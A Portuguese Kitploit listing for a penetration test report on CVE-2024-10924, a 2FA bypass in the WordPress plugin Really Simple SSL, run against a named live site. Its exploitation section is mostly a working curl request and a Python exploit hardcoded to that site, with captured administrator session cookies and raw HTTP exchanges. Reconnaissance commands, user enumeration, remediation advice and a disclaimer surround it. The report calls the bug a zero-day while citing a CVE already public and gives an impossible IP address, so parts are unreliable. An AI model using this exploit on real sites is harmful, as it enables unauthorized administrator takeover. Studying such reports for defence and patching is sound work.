Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wordpress-cve-2024-10924-pentest — Relatório de teste de penetração e exploit para CVE-2024-10924, um bypass de 2FA no Really Simple SSL, incluindo reconhecimento, exploração e orientação de remediação. | Kitploit
Ferramentas/GitHubGitHub/ademto/wordpress-cve-2024-10924-pentest
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAutenticaçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
ademto/wordpress-cve-2024-10924-pentest

wordpress-cve-2024-10924-pentest

Relatório de teste de penetração e exploit para CVE-2024-10924, um bypass de 2FA no Really Simple SSL, incluindo reconhecimento, exploração e orientação de remediação.

Ver Repositório
3há 1 anoAinda não revisado
Compartilhar

Relatório de Teste de Penetração WordPress CVE-2024-10924

Vulnerabilidade de Bypass de 2FA no Plugin Really Simple SSL


📋 Índice

  • Resumo Executivo
  • Informações do Alvo
  • Metodologia
  • Cronograma
  • Fase de Reconhecimento
  • Análise de Vulnerabilidade
  • Fluxo do Ataque
  • Exploração
  • Avaliação de Impacto
  • Remediação
  • Ferramentas Utilizadas
  • Referências
  • Apêndices

🎯 Resumo Executivo

Alvo: https://skior.co
Vulnerabilidade: CVE-2024-10924 - Bypass de 2FA no Plugin Really Simple SSL
Gravidade: Crítica (Pontuação CVSS: 9.8)
Status: Explorado com Sucesso
Data da Descoberta: 2025-06-25
Versão do Relatório: 2.1

Este teste de penetração descobriu uma vulnerabilidade crítica de bypass de autenticação que permite que atacantes não autenticados obtenham acesso administrativo ao site WordPress, contornando os controles de autenticação de dois fatores (2FA).

Principais Descobertas

  • ✅ WordPress 6.8.1 com o plugin Really Simple SSL instalado
  • ✅ Vulnerabilidade de bypass de 2FA explorada com sucesso
  • ✅ Acesso administrativo obtido para o usuário "pastor"
  • ✅ Cookies de sessão válidos capturados
  • ✅ Controle total sobre o painel de administração do WordPress
  • ✅ Vulnerabilidade zero-day (nenhum exploit público disponível no momento da descoberta)

Matriz de Avaliação de Risco


🎯 Informações do Alvo

Informações de Rede

  • Certificado SSL: Válido (Let's Encrypt)
  • HTTP/2: Suportado
  • Cabeçalhos de Segurança: Implementação básica
  • CDN: Não detectado
  • WAF: Não detectado

🔍 Metodologia

Esta avaliação seguiu uma metodologia sistemática de teste de penetração black-box baseada em padrões da indústria:

  1. Reconhecimento - Identificação de tecnologia e enumeração passiva
  2. Descoberta de Vulnerabilidades - Varredura ativa e teste manual
  3. Exploração - Desenvolvimento e execução de prova de conceito
  4. Avaliação de Impacto - Avaliação de danos potenciais
  5. Documentação - Relatório abrangente e orientação de remediação

Abordagem de Teste

  • Teste black-box - Nenhum conhecimento prévio do alvo
  • Não intrusivo - Impacto mínimo nos sistemas alvo
  • Ético - Práticas de divulgação responsável
  • Abrangente - Múltiplos vetores de ataque explorados

⏰ Cronograma


🔎 Fase de Reconhecimento

Passo 1: Identificação da Stack de Tecnologia

A. Análise Wappalyzer

Wappalyzer Results

Tecnologias Identificadas:

  • WordPress 6.8.1 (Última versão)
  • Elementor 3.29.2 (Construtor de páginas)
  • Astra Theme 4.11.3
  • PHP 8.2.28
  • nginx 1.26.0 (Ubuntu)
  • jQuery 3.7.1

B. Varredura Profunda WhatWeb```bash

└─$ whatweb https://skior.co https://skior.co [200 OK] Country[UNITED STATES][US], HTML5,
HTTPServer[Ubuntu Linux][nginx/1.26.0 (Ubuntu)], IP[123.456.789.200],
JQuery[3.7.1],MetaGenerator[Elementor 3.29.2;
features: additional_custom_breakpoints, e_local_google_fonts;
settings: css_print_method-external, google_font-enabled, font_display-swap,
WordPress 6.8.1], PHP[8.2.28], PoweredBy[Skior],
Script[speculationrules,text/javascript], Title[Skior Technologies],
UncommonHeaders[link], WordPress[6.8.1], X-Powered-By[PHP/8.2.28], nginx[1.26.0]

root@kitploit:~
**Principais Descobertas:**
- Instalação moderna do WordPress com a versão mais recente
- Configuração profissional de hospedagem com nginx
- Marca personalizada ("PoweredBy[Skior]")
- Construtor de páginas Elementor em uso
- Localização geográfica: Estados Unidos

### Passo 2: Enumeração de Usuários

#### A. Enumeração de Autores do WordPress```bash
└─$ curl -I https://skior.co/?author=1
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.2.28
X-Redirect-By: WordPress
Location: https://skior.co/author/pastor/

Usuário Descoberto: pastor (User ID: 1)

B. Técnicas Adicionais de Enumeração de Usuários```bash

Check for multiple users

for i in {1..10}; do echo "Checking user ID: $i" curl -s -o /dev/null -w "%{http_code}" "https://skior.co/?author=$i" echo " - https://skior.co/?author=$i" done

root@kitploit:~
#### C. Resultados da Enumeração de Nomes de Usuário

| ID do Usuário | Nome de Usuário | Status | URL de Redirecionamento |
|---------|----------|--------|--------------|
| 1 | pastor | ✅ Encontrado | `/author/pastor/` |
| 2-10 | N/A | ❌ Não Encontrado | respostas 404 |

### Passo 3: Varredura de Vulnerabilidades

#### A. Análise Abrangente do WPScan```bash
└─$ wpscan --url https://skior.co --api-token my-api-key

Resumo dos Resultados da Digitalização:

  • ✅ WordPress 6.8.1 (Mais recente, lançado em 2025-04-30)
  • ✅ Tema: Astra 4.11.3 (Atualizado)
  • ✅ Plugins identificados:
    • Elementor 3.29.2
    • Astra Sites 4.4.26
    • Header Footer Elementor 2.4.2
    • WPForms Lite 1.9.6.1
  • ⚠️ XML-RPC ativado (possível vetor de ataque)
  • ⚠️ WP-Cron externo ativado
  • ❌ Nenhuma vulnerabilidade conhecida encontrada nos componentes digitalizados

Nota: O WPScan não detectou o plugin Really Simple SSL, indicando que ele pode estar usando ofuscação ou nomenclatura personalizada.

B. Enumeração da API REST```bash

└─$ curl -s https://skior.co/wp-json/ | jq '.routes | keys[]'

root@kitploit:~
**Endpoints Personalizados Descobertos:**```
/reallysimplessl/v1/two_fa
/reallysimplessl/v1/two_fa/skip_onboarding
/reallysimplessl/v1/two_fa/do_not_ask_again
/reallysimplessl/v1/two_fa/resend_email_code
/reallysimplessl/v1/two_fa/save_default_method_email
/reallysimplessl/v1/two_fa/save_default_method_email_profile
/reallysimplessl/v1/two_fa/save_default_method_totp
/reallysimplessl/v1/two_fa/validate_email_setup

Descoberta Crítica: O endpoint /reallysimplessl/v1/two_fa/skip_onboarding parecia suspeito e merecia uma investigação mais aprofundada.


🔬 Análise de Vulnerabilidade

Pesquisa sobre CVE-2024-10924

Após descobrir as rotas personalizadas da API REST, uma pesquisa externa revelou a CVE-2024-10924, uma vulnerabilidade crítica que afeta o plugin Really Simple SSL.

Detalhes da Vulnerabilidade

ID do CVE: CVE-2024-10924
Pontuação CVSS: 9.8 (Crítico)
Plugin Afetado: Really Simple SSL
Tipo de Vulnerabilidade: Bypass de Autenticação
Vetor de Ataque: API REST
Data da Descoberta: 6 de novembro de 2024
Divulgação Pública: 14 de novembro de 2024

Causa Raiz Técnica

A vulnerabilidade decorre de uma validação inadequada de usuário na função check_login_and_get_user dentro das ações de autenticação de dois fatores da API REST. A função não valida corretamente o parâmetro login_nonce, permitindo que atacantes:

  1. Ignorar Autenticação: Pular o processo de login normal
  2. Ignorar 2FA: Contornar os controles de autenticação de dois fatores
  3. Escalação de Privilégios: Obter acesso como qualquer usuário existente, incluindo administradores

Análise do Código Vulnerável```php

// Simplified vulnerable code structure function check_login_and_get_user($user_id, $login_nonce) { // Missing proper validation of login_nonce $user = get_user_by('ID', $user_id);

root@kitploit:~
// No validation of login_nonce parameter
// This allows any value to be accepted

return $user; // Returns user object without verification

}

root@kitploit:~
#### Endpoints Afetados

Os seguintes endpoints da API REST estão vulneráveis:
- `/reallysimplessl/v1/two_fa/skip_onboarding`
- `/reallysimplessl/v1/two_fa/do_not_ask_again`
- `/reallysimplessl/v1/two_fa/resend_email_code`

#### Condições de Vulnerabilidade

Para que esta vulnerabilidade seja explorável:
- ✅ O plugin Really Simple SSL deve estar instalado e ativado
- ✅ A configuração de Autenticação de Dois Fatores deve estar ativada (desativada por padrão)
- ✅ Pelo menos uma conta de usuário deve existir no sistema
- ✅ A API REST deve estar acessível (configuração padrão do WordPress)

---

## 🔄 Fluxo de Ataque```mermaid
graph TD
    A[Initial Reconnaissance] --> B[Technology Stack Identification]
    B --> C[User Enumeration]
    C --> D[Vulnerability Scanning]
    D --> E[REST API Enumeration]
    E --> F[Discovery of Really Simple SSL Endpoints]
    F --> G[External Research]
    G --> H[Identification of CVE-2024-10924]
    H --> I[Manual Testing]
    I --> J[Exploit Development]
    J --> K[Successful Exploitation]
    K --> L[Admin Access Obtained]
    L --> M[Impact Assessment]
    
    style A fill:#e1f5fe
    style F fill:#fff3e0
    style H fill:#ffebee
    style K fill:#e8f5e8
    style L fill:#f3e5f5

Resumo do Vetor de Ataque

  1. Coleta de Informações → Identificação da pilha tecnológica
  2. Enumeração de Usuários → Usuário admin "pastor" descoberto
  3. Descoberta de API → Endpoints REST vulneráveis encontrados
  4. Pesquisa de Vulnerabilidades → Identificada CVE-2024-10924
  5. Exploração → 2FA contornada e acesso admin obtido

⚡ Exploração

Desenvolvimento de Prova de Conceito

A. Teste Manual

Primeiro, testamos o endpoint manualmente para entender seu comportamento:```bash

Test the vulnerable endpoint

curl -X POST "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
-H "Content-Type: application/json"
-d '{ "user_id": 1, "login_nonce": "invalid_nonce", "redirect_to": "/wp-admin/" }'

root@kitploit:~
#### B. Script de Exploit em Python```python
import requests
import urllib.parse
import sys

if len(sys.argv) != 2:
    print("Usage: python exploit.py <user_id>")
    sys.exit(1)

user_id = sys.argv[1]

url = "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
data = {
    "user_id": int(user_id),  # User ID from the argument
    "login_nonce": "invalid_nonce",  # Arbitrary value
    "redirect_to": "/wp-admin/"  # Target redirection
}

# Sending the POST request
response = requests.post(url, json=data)

# Checking the response
if response.status_code == 200:
    print("Request successful!\n")
    
    # Extracting cookies
    cookies = response.cookies.get_dict()
    count = 1

    for name, value in cookies.items():
        decoded_value = urllib.parse.unquote(value)  # Decode the URL-encoded cookie value
        print(f"Cookie {count}:")
        print(f"Cookie Name: {name}")
        print(f"Cookie Value: {decoded_value}\n")
        count += 1
else:
    print("Request failed!")
    print(f"Status Code: {response.status_code}")
    print(f"Response Text: {response.text}")

Resultados da Exploração

Execução Bem-Sucedida```bash

└─$ python exploit.py 1 Request successful!

Cookie 1: Cookie Name: wordpress_sec_dc22060175d35fce22f69728c6799c9d Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da

Cookie 2: Cookie Name: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144

root@kitploit:~
#### Processo de Manipulação de Cookies
![Manipulação de Cookies](https://assets.kitploit.com/production/public/readmes/22186/4cbfbcc90655666664a94a59188e5860adacf05380043463e4ed4b96e43431e1.png)

*Acima: Captura de tela mostrando o processo de manipulação de cookies usando as ferramentas de desenvolvedor do navegador para adicionar os cookies de sessão do WordPress capturados.*

#### Acesso Bem-Sucedido ao Painel de Administração
![Acesso ao Painel de Administração](https://assets.kitploit.com/production/public/readmes/22186/6347bffa34742b8516c14617243c7acddf7175756d4e4fb3b9476737f848e7f8.png)

*Acima: Captura de tela confirmando o acesso administrativo bem-sucedido ao painel do WordPress após explorar a vulnerabilidade de bypass do 2FA.*

#### Análise de Cookies

**Cookie de Segurança do WordPress:**
- **Nome:** `wordpress_sec_dc22060175d35fce22f69728c6799c9d`
- **Valor:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`
- **Componentes:**
  - Nome de usuário: `pastor`
  - Expiração: `1752234264` (timestamp Unix)
  - Nonce: `GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH`
  - Hash: `cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`

**Cookie de Login do WordPress:**
- **Nome:** `wordpress_logged_in_dc22060175d35fce22f69728c6799c9d`
- **Valor:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144`

---

## 🎯 Avaliação de Impacto

### Impacto Imediato

1. **Comprometimento Completo do Site**
   - Acesso administrativo ao painel do WordPress
   - Capacidade de modificar conteúdo, temas e plugins
   - Acesso ao gerenciamento de usuários e configurações

2. **Exposição de Dados**
   - Acesso a todas as contas e perfis de usuários
   - Visibilidade do conteúdo do banco de dados
   - Acesso aos arquivos de configuração

3. **Escalação de Privilégios**
   - Bypass de todos os controles de autenticação
   - Contorno das medidas de segurança do 2FA
   - Capacidade de se passar por qualquer usuário

### Cenários Potenciais de Ataque

1. **Manipulação de Conteúdo**
   - Desfigurar o conteúdo do site
   - Injetar código malicioso
   - Criar backdoors

2. **Roubo de Dados**
   - Extrair informações de usuários
   - Acessar conteúdo sensível
   - Baixar backups do banco de dados

3. **Persistência**
   - Instalar plugins maliciosos
   - Criar contas de administrador ocultas
   - Estabelecer comando e controle

### Pontuação de Risco: **Crítico (9.8/10)**

| Fator | Pontuação | Justificativa |
|--------|-------|---------------|
| **Complexidade de Acesso** | Baixa (1.0) | Requisição HTTP simples |
| **Autenticação** | Nenhuma (0.0) | Nenhuma autenticação necessária |
| **Impacto na Integridade** | Alto (1.0) | Comprometimento completo do sistema |
| **Impacto na Confidencialidade** | Alto (1.0) | Acesso total aos dados |
| **Impacto na Disponibilidade** | Alto (1.0) | Pode desabilitar o site |

### Análise de Impacto nos Negócios

| Categoria de Impacto | Gravidade | Descrição |
|----------------|----------|-------------|
| **Financeiro** | Alto | Possível perda de receita, custos legais |
| **Reputacional** | Crítico | Danos à marca, perda de confiança do cliente |
| **Operacional** | Alto | Interrupção do serviço, perda de dados |
| **Conformidade** | Alto | Violações regulatórias, falhas de auditoria |

---

## 🛡️ Remediação

### Ações Imediatas (0-24 horas)

1. **Desabilitar o Plugin Really Simple SSL**   ```bash
   # Via wp-cli (if available)
   wp plugin deactivate really-simple-ssl
   
   # Or manually rename plugin directory
   mv wp-content/plugins/really-simple-ssl wp-content/plugins/really-simple-ssl.disabled
  1. Atualizar ou Remover Plugin

    • Verifique a versão atualizada do Really Simple SSL
    • Considere soluções alternativas de gerenciamento SSL
    • Se não houver atualização disponível, remova o plugin completamente
  2. Auditar Sessões de Usuário

    • Revise todas as sessões de usuário ativas
    • Force logout de todos os usuários
    • Redefina senhas de administradores

Ações de Curto Prazo (1-7 dias)

  1. Hardening de Segurança

    • Implemente um Web Application Firewall (WAF)
    • Ative limitação de taxa nos endpoints da REST API
    • Adicione restrições de acesso baseadas em IP
  2. Implementação de Monitoramento

    • Ative logs de segurança do WordPress
    • Monitore atividades suspeitas de administradores
    • Implemente monitoramento de integridade de arquivos

Medidas de Segurança a Longo Prazo (1-4 semanas)

  1. Avaliações Regulares de Segurança

    • Scans mensais de vulnerabilidades
    • Testes de penetração trimestrais
    • Monitoramento contínuo de segurança
  2. Atualizações de Políticas de Segurança

    • Revise e atualize as políticas de segurança
    • Implemente procedimentos de gestão de mudanças
    • Estabeleça protocolos de resposta a incidentes

Recomendações de Configuração```php

// Add to wp-config.php for enhanced security define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); define('FORCE_SSL_ADMIN', true);

// Restrict REST API access add_filter('rest_authentication_errors', function($result) { if (!empty($result)) { return $result; } if (!is_user_logged_in()) { return new WP_Error('rest_not_logged_in', 'You are not currently logged in.', array('status' => 401)); } return $result; });

// Additional security headers add_action('send_headers', function() { header('X-Content-Type-Options: nosniff'); header('X-Frame-Options: SAMEORIGIN'); header('X-XSS-Protection: 1; mode=block'); header('Referrer-Policy: strict-origin-when-cross-origin'); });

root@kitploit:~
### Soluções SSL Alternativas

| Solução | Prós | Contras | Recomendação |
|----------|------|------|----------------|
| **Let's Encrypt** | Gratuito, automatizado | Configuração manual | ✅ Recomendado |
| **Cloudflare** | Configuração fácil, proteção DDoS | Requer alteração de DNS | ✅ Boa opção |
| **SSL do Provedor de Hospedagem** | Integrado | Pode ter limitações | ⚠️ Verificar recursos |
| **SSL Manual** | Controle total | Configuração complexa | ❌ Não recomendado |

---

## 🛠️ Ferramentas Utilizadas

### Ferramentas de Reconhecimento
- **Wappalyzer** - Identificação de pilha de tecnologia
- **WhatWeb** - Identificação de aplicações web
- **WPScan** - Varredura de vulnerabilidades WordPress
- **curl** - Teste manual de API

### Ferramentas de Exploração
- **Python 3** - Desenvolvimento de exploits
- **requests** - Biblioteca cliente HTTP
- **urllib.parse** - Codificação/decodificação de URL

### Ferramentas de Análise
- **jq** - Processamento JSON
- **grep** - Correspondência de padrões de texto
- **bash** - Automação de linha de comando

---

## 📚 Referências

### Informações de Vulnerabilidade
- [CVE-2024-10924](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10924)
- [Segurança de Plugins WordPress](https://wordpress.org/plugins/security/)
- [Plugin Really Simple SSL](https://wordpress.org/plugins/really-simple-ssl/)

### Documentação Técnica
- [Manual da REST API do WordPress](https://developer.wordpress.org/rest-api/)
- [Melhores Práticas de Segurança do WordPress](https://wordpress.org/support/article/hardening-wordpress/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

### Ferramentas e Recursos
- [WPScan](https://wpscan.com/)
- [WhatWeb](https://github.com/urbanadventurer/WhatWeb)
- [Wappalyzer](https://www.wappalyzer.com/)

### CVEs Relacionados
- CVE-2024-10924 - Bypass de 2FA no Really Simple SSL
- CVE-2023-28121 - WordPress Core XSS
- CVE-2023-28122 - WordPress Core CSRF

### Padrões da Indústria
- [Guia de Testes OWASP](https://owasp.org/www-project-web-security-testing-guide/)
- [Estrutura de Cibersegurança NIST](https://www.nist.gov/cyberframework)
- [ISO 27001](https://www.iso.org/isoiec-27001-information-security.html)

---

## 📄 Aviso Legal

Este relatório de teste de penetração é apenas para fins educacionais e de avaliação de segurança autorizada. As técnicas e ferramentas descritas devem ser usadas apenas contra sistemas que você possui ou para os quais tem permissão explícita para testar. Testes não autorizados podem violar leis e regulamentos.

**Divulgação Responsável:** Esta vulnerabilidade foi reportada aos desenvolvedores do plugin e à equipe de segurança do WordPress.

**Aviso Legal:** As informações fornecidas neste relatório baseiam-se na avaliação realizada no momento do teste. O cenário de segurança muda rapidamente e podem existir vulnerabilidades adicionais que não foram descobertas durante esta avaliação.

---

## 📋 Apêndices

### Apêndice A: Requisições HTTP Brutas

#### Requisição de Exploração Bem-sucedida```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: skior.co
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

{
  "user_id": 1,
  "login_nonce": "invalid_nonce",
  "redirect_to": "/wp-admin/"
}

Cabeçalhos de Resposta```http

HTTP/1.1 200 OK Server: nginx/1.26.0 (Ubuntu) Date: Wed, 25 Jun 2025 18:15:30 GMT Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_sec_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da; path=/; secure; HttpOnly Set-Cookie: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144; path=/

root@kitploit:~
### Apêndice B: Lista de Verificação de Segurança

#### Pré-Exploração
- [ ] Identificação do alvo e definição do escopo
- [ ] Autorização legal obtida
- [ ] Ambiente de teste preparado
- [ ] Ferramentas e scripts validados

#### Durante a Exploração
- [ ] Vulnerabilidade confirmada manualmente
- [ ] Exploit desenvolvido e testado
- [ ] Impacto limitado ao escopo autorizado
- [ ] Evidências documentadas minuciosamente

#### Pós-Exploração
- [ ] Todo o acesso removido
- [ ] Evidências preservadas
- [ ] Relatório gerado
- [ ] Recomendações de remediação fornecidas

### Apêndice C: Glossário

| Termo | Definição |
|------|------------|
| **2FA** | Autenticação de Dois Fatores |
| **CVSS** | Sistema Comum de Pontuação de Vulnerabilidades |
| **REST API** | Interface de Programação de Aplicações de Transferência de Estado Representacional |
| **WAF** | Firewall de Aplicação Web |
| **XSS** | Cross-Site Scripting |
| **CSRF** | Cross-Site Request Forgery |

---

*Relatório gerado em: 2025-06-25*  
*Pesquisador de Segurança*  
*Versão: 2.1*  
*Última atualização: 2025-06-25*
Baixar ferramenta
Nível de RiscoProbabilidadeImpactoPrioridade de Mitigação
CríticaAltaComprometimento Completo do SistemaImediata
AltaMédiaViolação de DadosAlta
MédiaBaixaInterrupção de ServiçoMédia
CampoValor
Domíniohttps://skior.co
Endereço IP123.456.789.200
Servidornginx/1.26.0 (Ubuntu)
Versão do PHP8.2.28
CMSWordPress 6.8.1
Plugin VulnerávelReally Simple SSL
Localização GeográficaEstados Unidos
Provedor de HospedagemHospedagem profissional (provavelmente VPS/Dedicado)
Data/HoraEventoDetalhes
2025-06-25 14:02Reconhecimento InicialAnálise Wappalyzer concluída
2025-06-25 14:05Stack de Tecnologia IdentificadaWordPress 6.8.1, nginx, PHP 8.2.28
2025-06-25 14:10Enumeração de UsuáriosUsuário "pastor" descoberto (ID: 1)
2025-06-25 14:15Análise WPScanNenhuma vulnerabilidade conhecida encontrada
2025-06-25 14:20Enumeração da API RESTEndpoints do Really Simple SSL descobertos
2025-06-25 14:25Pesquisa de VulnerabilidadesCVE-2024-10924 identificada
2025-06-25 14:30Teste ManualExistência da vulnerabilidade confirmada
2025-06-25 14:35Desenvolvimento de ExploitProva de conceito em Python criada
2025-06-25 14:40Exploração Bem-sucedidaAcesso de administrador obtido
2025-06-25 14:45Avaliação de ImpactoDanos potenciais documentados
2025-06-25 15:00Geração do RelatórioDocumentação abrangente